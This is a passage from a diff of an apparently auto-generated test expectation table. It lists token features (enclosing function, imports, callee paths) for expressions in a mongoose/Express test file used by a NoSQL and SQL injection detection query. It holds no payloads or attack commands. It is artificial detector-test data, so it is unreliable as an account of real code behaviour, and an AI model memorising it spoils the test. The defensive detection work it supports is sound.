autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:22:88:25 | exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:22:88:25 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:22:88:25 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:22:88:25 | exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:26 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:26 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:26 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:26 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.findOne().exec | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | (err, r ... (query) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | (err, r ... (query) | calleeImports | mongoose | @@ -2610,6 +13217,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | (err, r ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | (err, r ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:27:88:56 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:28:88:30 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:33:88:35 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:33:88:35 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:33:88:35 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:33:88:35 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:43 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:43 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:43 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:43 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:49 | err.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:49 | err.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:49 | err.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:49 | err.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | err.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | exceptional return of err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | exceptional return of err.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | exceptional return of err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:41:88:56 | exceptional return of err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:45:88:49 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:45:88:49 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:45:88:49 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:45:88:49 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:51:88:55 | query | CalleeFlexibleAccessPath | err.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:51:88:55 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:51:88:55 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2617,6 +13264,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:51:88:55 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:51:88:55 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:88:51:88:55 | query | receiverName | err | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | Document.findOne(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | exceptional return of Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | exceptional return of Document.findOne(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | exceptional return of Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:20 | exceptional return of Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:25 | Documen ... X).then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:25 | Documen ... X).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:25 | Documen ... X).then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:25 | Documen ... X).then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:2:89:52 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:11:89:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:11:89:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:11:89:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:11:89:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:19:89:19 | X | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:19:89:19 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:19:89:19 | X | calleeImports | mongoose | @@ -2625,6 +13304,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:19:89:19 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:19:89:19 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:19:89:19 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:22:89:25 | then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:22:89:25 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:22:89:25 | then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:22:89:25 | then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:26 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:26 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:26 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:26 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | (res) = ... (query) | CalleeFlexibleAccessPath | Document.findOne().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | (res) = ... (query) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | (res) = ... (query) | calleeImports | mongoose | @@ -2632,6 +13323,42 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | (res) = ... (query) | contextSurroundingFunctionParameters | (req, res)\n(res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | (res) = ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | (res) = ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:27:89:51 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:28:89:30 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:38 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:38 | res | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:38 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:38 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:44 | res.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:44 | res.count | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:44 | res.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:44 | res.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | exceptional return of res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | exceptional return of res.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | exceptional return of res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | exceptional return of res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | res.count(query) | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:36:89:51 | res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:40:89:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:40:89:44 | count | contextSurroundingFunctionParameters | (req, res)\n(res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:40:89:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:40:89:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:46:89:50 | query | CalleeFlexibleAccessPath | res.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:46:89:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:46:89:50 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2639,6 +13366,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:46:89:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:46:89:50 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:89:46:89:50 | query | receiverName | res | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | Document.findOne(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | exceptional return of Document.findOne(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | exceptional return of Document.findOne(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | exceptional return of Document.findOne(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:20 | exceptional return of Document.findOne(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:25 | Documen ... X).then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:25 | Documen ... X).then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:25 | Documen ... X).then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:25 | Documen ... X).then | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:2:90:55 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:11:90:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:11:90:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:11:90:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:11:90:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:19:90:19 | X | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:19:90:19 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:19:90:19 | X | calleeImports | mongoose | @@ -2647,6 +13406,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:19:90:19 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:19:90:19 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:19:90:19 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:22:90:25 | then | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:22:90:25 | then | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:22:90:25 | then | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:22:90:25 | then | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:27:90:27 | Y | CalleeFlexibleAccessPath | Document.findOne().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:27:90:27 | Y | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:27:90:27 | Y | calleeImports | mongoose | @@ -2654,6 +13417,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:27:90:27 | Y | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:27:90:27 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:27:90:27 | Y | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:29 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:29 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | 'arguments' object of anonymous function | contextFunctionInterfaces | 